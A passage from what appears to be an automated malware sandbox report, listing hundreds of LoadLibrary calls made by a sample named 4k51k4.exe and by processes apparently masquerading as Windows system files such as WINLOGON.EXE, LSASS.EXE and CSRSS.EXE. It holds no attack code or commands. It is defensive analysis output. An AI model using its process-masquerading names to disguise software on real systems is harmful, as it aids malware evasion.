called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004312)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006128)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006128)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006128)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006128)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006128)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006128)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006128)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004140)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004140)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004140)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004140)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004140)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004140)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004140)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004140)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004140)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004140)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004140)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005992)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005992)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005992)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005992)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005992)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005992)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005992)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005992)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005932)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005932)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003572)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002744)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002744)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003560)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003560)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003560)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003560)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003560)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003560)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003780)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003780)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003780)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003780)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003780)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003780)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003780)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003780)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00002632)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002660)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002660)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002660)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002660)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002660)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002660)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004456)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004456)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004456)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004456)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004456)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004456)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004456)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004456)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004456)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004456)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003556)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003556)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003556)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003556)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003556)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003556)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003556)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003556)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003556)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003556)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004404)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004404)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004404)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004404)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004404)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001200)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001200)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001200)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001200)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001200)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001200)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001200)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001200)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001200)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001200)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002236)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002236)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002236)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002236)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002236)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002236)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002236)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002236)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002044)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002044)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002044)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002044)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002044)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002044)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002044)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002044)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001880)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001880)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001880)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001880)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001880)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001880)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001880)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001880)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001880)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001880)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004380)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002644)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002644)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002644)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002644)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002644)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002644)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004396)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004128)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004128)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004128)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004128)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004128)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004128)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004128)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004128)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004356)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003856)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003856)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003856)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003856)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003856)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 